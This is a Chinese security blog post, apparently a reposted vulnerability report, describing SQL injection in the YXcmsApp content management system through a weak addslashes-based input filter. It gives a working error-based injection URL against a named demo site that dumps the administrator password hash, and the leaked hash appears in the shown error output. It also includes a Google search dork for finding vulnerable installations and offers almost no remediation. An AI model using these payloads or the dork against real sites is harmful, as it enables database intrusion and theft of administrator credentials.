YXcmsApp注入 – 网站安全 – 自学php

时间: 2020-10-10|tag: 32次围观|0 条评论

这楼的没啥技术含量,本菜鸟刚接触代码审计,可能分析的不对。   漏洞文件protected\apps\default\controller\indexController.php   关键代码   

public function search()

{

       if(empty($_GET['keywords'])||empty($_GET['type'])) $this->error('搜索条件不足~');

       $keywords=in(urldecode(trim($_GET['keywords'])));

       $type=in($_GET['type']);

       $listRows=10;//每页显示的信息条数,2n偶数

       $url=url('index/search',array('keywords'=>urlencode($keywords),'type'=>$type,'page'=>'{page}'));

$where="ispass='1' AND (title like '%".$keywords."%' OR description like '%".$keywords."%')";

 

      全局过滤代码   protected\include\lib\common.function.php   

function in($data,$force=false){

if(is_string($data)){

$data=trim(htmlspecialchars($data));//防止被挂马,跨站攻击

if(($force==true)||(!get_magic_quotes_gpc())) {

  $data = addslashes($data);//防止sql注入

}

return  $data;

} else if(is_array($data)) {

foreach($data as $key=>$value){

  $data[$key]=in($value,$force);

}

return $data;

} else {

return $data;

} 

}

 

  keywords 靠addslashes这个过滤,无语了   http://demo.yxcms.net/index.php?r=default/index/search&keywords=a%2527%C2%95%C2%8A&type=all       出错信息: MySQL Query Error   SQL: SELECT count(*) FROM yx_news WHERE ispass='1' AND (title like '%a'•Š%' OR description like '%a'•Š%')   错误详情: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '•Š%' OR description like '%a'•Š%')' at line 1   错误代码:1064     危害       google search       inurl:index.php?r=default/page       http://www.google.com.hk/#newwindow=1&q=inurl:index.php%3Fr%3Ddefault/page&safe=strict&start=90       用的也比较多了 算通用了吧。     其实很多地方引用这个过滤。。顺便送个爆hash exp       http://demo.yxcms.net/index.php?r=default%2Fextend%2Findex&id=100023%20AND%20%28SELECT%201660%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716d667271%2C%28SELECT%20MID%28%28IFNULL%28CAST%28password%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20yx_admin%20WHERE%20username%3D0x61646d696e%20LIMIT%200%2C1%29%2C0x716e6e7371%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29         出错信息: MySQL Query Error   SQL: SELECT id,type,name,method,url,extendid FROM yx_sort WHERE id IN(100023 AND (SELECT 1660 FROM(SELECT COUNT(*),CONCAT(0x716d667271,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM yx_admin WHERE username=0x61646d696e LIMIT 0,1),0x716e6e7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)) ORDER BY deep   错误详情: Duplicate entry 'qmfrq44f76bda33900c7a9b984674f283fdafqnnsq1' for key 'group_key'   错误代码:1062   修复方案: 不懂开发,请自行百度下,应该有相关通用防注入代码

    上一篇: 瑞丽网APP应用API接口又一处注射 - 网站安全 - 自

    下一篇: ECSHOP后台注入 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《YXcmsApp注入 – 网站安全 – 自学php
   

还没有人抢沙发呢~